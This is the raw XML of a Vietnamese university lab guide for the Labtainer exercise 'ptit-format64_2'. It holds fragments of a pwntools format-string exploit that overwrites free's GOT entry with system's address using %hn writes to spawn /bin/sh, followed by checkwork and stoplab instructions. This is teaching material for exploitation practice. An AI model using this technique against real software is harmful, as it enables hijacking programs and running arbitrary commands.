            <w:r w:rsidRPr="00994C26">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000080"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
                <w:highlight w:val="white"/>
                <w:lang w:eastAsia="ko-KR" w:bidi="th-TH"/>
              </w:rPr>
              <w:t>&gt;&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00994C26">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
                <w:highlight w:val="white"/>
                <w:lang w:eastAsia="ko-KR" w:bidi="th-TH"/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
            <w:r w:rsidRPr="00994C26">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000080"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
                <w:highlight w:val="white"/>
                <w:lang w:eastAsia="ko-KR" w:bidi="th-TH"/>
              </w:rPr>
              <w:t>)&amp;</w:t>
            </w:r>
            <w:r w:rsidRPr="00994C26">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
                <w:highlight w:val="white"/>
                <w:lang w:eastAsia="ko-KR" w:bidi="th-TH"/>
              </w:rPr>
              <w:t>0xffff</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system </w:t>
            </w:r>
            <w:r w:rsidRPr="00994C26">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000080"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
                <w:highlight w:val="white"/>
                <w:lang w:eastAsia="ko-KR" w:bidi="th-TH"/>
              </w:rPr>
              <w:t>&amp;</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0xffff</w:t>
            </w:r>
            <w:r w:rsidRPr="00994C26">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000080"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
                <w:highlight w:val="white"/>
                <w:lang w:eastAsia="ko-KR" w:bidi="th-TH"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3630A30A"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b/>
                <w:bCs/>
                <w:color w:val="0000FF"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
                <w:highlight w:val="white"/>
                <w:lang w:eastAsia="ko-KR" w:bidi="th-TH"/>
              </w:rPr>
              <w:t>else</w:t>
            </w:r>
            <w:r w:rsidRPr="00994C26">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000080"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
                <w:highlight w:val="white"/>
                <w:lang w:eastAsia="ko-KR" w:bidi="th-TH"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02EB986B" w14:textId="40D24132"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ab/>
              <w:t>first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second</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amount1</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amount2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0032140C" w:rsidRPr="00994C26">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
                <w:highlight w:val="white"/>
                <w:lang w:eastAsia="ko-KR" w:bidi="th-TH"/>
              </w:rPr>
              <w:t>free_got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0032140C" w:rsidRPr="00994C26">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
                <w:highlight w:val="white"/>
                <w:lang w:eastAsia="ko-KR" w:bidi="th-TH"/>
              </w:rPr>
              <w:t>free_got+2</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system </w:t>
            </w:r>
            <w:r w:rsidRPr="00994C26">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000080"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
                <w:highlight w:val="white"/>
                <w:lang w:eastAsia="ko-KR" w:bidi="th-TH"/>
              </w:rPr>
              <w:t>&amp;</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FF0000"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
                <w:highlight w:val="white"/>
                <w:lang w:eastAsia="ko-KR" w:bidi="th-TH"/>
              </w:rPr>
              <w:t>0xffff</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system</w:t>
            </w:r>
            <w:r w:rsidRPr="00994C26">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000080"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
                <w:highlight w:val="white"/>
                <w:lang w:eastAsia="ko-KR" w:bidi="th-TH"/>
              </w:rPr>
              <w:t>&gt;&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00994C26">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
                <w:highlight w:val="white"/>
                <w:lang w:eastAsia="ko-KR" w:bidi="th-TH"/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
            <w:r w:rsidRPr="00994C26">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000080"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
                <w:highlight w:val="white"/>
                <w:lang w:eastAsia="ko-KR" w:bidi="th-TH"/>
              </w:rPr>
              <w:t>)&amp;</w:t>
            </w:r>
            <w:r w:rsidRPr="00994C26">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
                <w:highlight w:val="white"/>
                <w:lang w:eastAsia="ko-KR" w:bidi="th-TH"/>
              </w:rPr>
              <w:t>0xffff</w:t>
            </w:r>
            <w:r w:rsidRPr="00994C26">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000080"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
                <w:highlight w:val="white"/>
                <w:lang w:eastAsia="ko-KR" w:bidi="th-TH"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2342F5EC"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5AE1294A"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buffer start at parameter 8th on stack</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0AF9E277"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payload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880088"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
                <w:highlight w:val="white"/>
                <w:lang w:eastAsia="ko-KR" w:bidi="th-TH"/>
              </w:rPr>
              <w:t>str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amount1</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encode</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b'c%12$hn'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F7195E5"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payload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880088"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
                <w:highlight w:val="white"/>
                <w:lang w:eastAsia="ko-KR" w:bidi="th-TH"/>
              </w:rPr>
              <w:t>str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amount2</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amount1</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encode</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b'c%13$hn'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3390418B"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payload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payload</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ljust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FF0000"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
                <w:highlight w:val="white"/>
                <w:lang w:eastAsia="ko-KR" w:bidi="th-TH"/>
              </w:rPr>
              <w:t>32</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w:t>
            </w:r>
            <w:r w:rsidRPr="00994C26">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000080"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
                <w:highlight w:val="white"/>
                <w:lang w:eastAsia="ko-KR" w:bidi="th-TH"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="402F32AF"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 xml:space="preserve">payload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p64</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first</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p64</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second</w:t>
            </w:r>
            <w:r w:rsidRPr="00994C26">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000080"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
                <w:highlight w:val="white"/>
                <w:lang w:eastAsia="ko-KR" w:bidi="th-TH"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6DB83E76"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payload</w:t>
            </w:r>
            <w:r w:rsidRPr="00994C26">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000080"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
                <w:highlight w:val="white"/>
                <w:lang w:eastAsia="ko-KR" w:bidi="th-TH"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50411B5E"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#pause()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6CC3D191"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b"N"</w:t>
            </w:r>
            <w:r w:rsidRPr="00994C26">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000080"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
                <w:highlight w:val="white"/>
                <w:lang w:eastAsia="ko-KR" w:bidi="th-TH"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F4BA183"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recvuntil</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p>
          <w:p w14:paraId="037FDF8F"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5BB01091"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 step 3: exec /bin/sh</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C787D8B"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8000"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
                <w:highlight w:val="white"/>
                <w:lang w:eastAsia="ko-KR" w:bidi="th-TH"/>
              </w:rPr>
              <w:t>#pause()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0575026F"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b"D"</w:t>
            </w:r>
            <w:r w:rsidRPr="00994C26">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000080"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
                <w:highlight w:val="white"/>
                <w:lang w:eastAsia="ko-KR" w:bidi="th-TH"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74EB13FE"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sendlineafter</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808080"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
                <w:highlight w:val="white"/>
                <w:lang w:eastAsia="ko-KR" w:bidi="th-TH"/>
              </w:rPr>
              <w:t>b"&gt; "</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 xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00994C26">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="808080"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
                <w:highlight w:val="white"/>
                <w:lang w:eastAsia="ko-KR" w:bidi="th-TH"/>
              </w:rPr>
              <w:t>b"0"</w:t>
            </w:r>
            <w:r w:rsidRPr="00994C26">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000080"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
                <w:highlight w:val="white"/>
                <w:lang w:eastAsia="ko-KR" w:bidi="th-TH"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="796AF5E6" w14:textId="77777777" w:rsidR="00035EC8" w:rsidRPr="00994C26" w:rsidRDefault="00035EC8" w:rsidP="00994C26">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4C264547" w14:textId="176877DC" w:rsidR="006B7D63" w:rsidRPr="00994C26" w:rsidRDefault="00035EC8" w:rsidP="00994C26">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00994C26">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
                <w:highlight w:val="white"/>
                <w:lang w:eastAsia="ko-KR" w:bidi="th-TH"/>
              </w:rPr>
              <w:t>p</w:t>
            </w:r>
            <w:r w:rsidRPr="00994C26">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000080"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
                <w:highlight w:val="white"/>
                <w:lang w:eastAsia="ko-KR" w:bidi="th-TH"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidRPr="00994C26">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
                <w:highlight w:val="white"/>
                <w:lang w:eastAsia="ko-KR" w:bidi="th-TH"/>
              </w:rPr>
              <w:t>interactive</w:t>
            </w:r>
            <w:r w:rsidRPr="00994C26">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000080"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
                <w:highlight w:val="white"/>
                <w:lang w:eastAsia="ko-KR" w:bidi="th-TH"/>
              </w:rPr>
              <w:t>()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7604C557" w14:textId="77777777" w:rsidR="006B7D63" w:rsidRPr="00994C26" w:rsidRDefault="006B7D63" w:rsidP="00994C26">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08894819" w14:textId="24D1E0C9" w:rsidR="00F866B5" w:rsidRDefault="00994C26" w:rsidP="00994C2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Kết thúc bài lab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C6D4AA4" w14:textId="77777777" w:rsidR="00994C26" w:rsidRPr="00970317" w:rsidRDefault="00994C26" w:rsidP="00994C26">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00970317">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Thực hiện checkwork bài lab bằng câu lệnh bên dưới:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D5454D" w14:textId="311E4B60" w:rsidR="00994C26" w:rsidRPr="00245B61" w:rsidRDefault="00994C26" w:rsidP="00994C26">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00245B61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">checkwork </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>ptit-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>format64_2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD07F00" w14:textId="77777777" w:rsidR="00994C26" w:rsidRPr="00970317" w:rsidRDefault="00994C26" w:rsidP="00994C26">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00970317">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Trên terminal đầu tiên sử dụng câu lệnh sau để kết thúc bài lab:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A7F3EF3" w14:textId="77777777" w:rsidR="00994C26" w:rsidRPr="00245B61" w:rsidRDefault="00994C26" w:rsidP="00994C26">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>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stoplab </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>ptit-format64_2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F561552" w14:textId="3E9EBEBA" w:rsidR="00994C26" w:rsidRPr="00994C26" w:rsidRDefault="00994C26" w:rsidP="00994C26">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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Trong quá trình làm bài sinh viên cần thực hiện lại bài lab, dùng câu lệnh: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52086C87" w14:textId="4CF81D61" w:rsidR="00994C26" w:rsidRPr="00994C26" w:rsidRDefault="00994C26" w:rsidP="00994C26">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00994C26">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">labtainer -r </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>ptit-format64_2</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00994C26" w:rsidRPr="0099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833FFB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F502E378"/>
    <w:lvl w:ilvl="0" w:tplc="042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FFC2609"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="15AE3740"/>
    <w:lvl w:ilvl="0" w:tplc="042A000F">
      <w:start w:val="2"/>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FA4537"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0C78AAA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686528FB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8DD237C2"/>
    <w:lvl w:ilvl="0" w:tplc="68B697B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582140">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="743186230">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="128322731">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1976134122">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1501192623">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="89666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63"/>
    <w:rsid w:val="00035EC8"/>
    <w:rsid w:val="000A08BE"/>
    <w:rsid w:val="00170AE5"/>
    <w:rsid w:val="001E5331"/>
    <w:rsid w:val="002573B0"/>
    <w:rsid w:val="0032140C"/>
    <w:rsid w:val="003C68AC"/>
    <w:rsid w:val="005445A4"/>
    <w:rsid w:val="006B7D63"/>
    <w:rsid w:val="007E7A19"/>
    <w:rsid w:val="00906FBC"/>
    <w:rsid w:val="009334B1"/>
    <w:rsid w:val="00953650"/>
    <w:rsid w:val="00994C26"/>
    <w:rsid w:val="009A0A8C"/>
    <w:rsid w:val="00B170FB"/>
    <w:rsid w:val="00B27CC8"/>
    <w:rsid w:val="00D6323C"/>
    <w:rsid w:val="00D83FB7"/>
    <w:rsid w:val="00DA0D01"/>
    <w:rsid w:val="00EB4473"/>
    <w:rsid w:val="00EB4671"/>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A8D4"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{2651B45F-1385-459F-8ADE-FE24C586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01"/>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63"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="006B7D63"/>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0FB"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B17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Huong Pham</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-12-03T19:42:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-12-03T19:43:00Z</dcterms:modified>
</cp:coreProperties>
</file>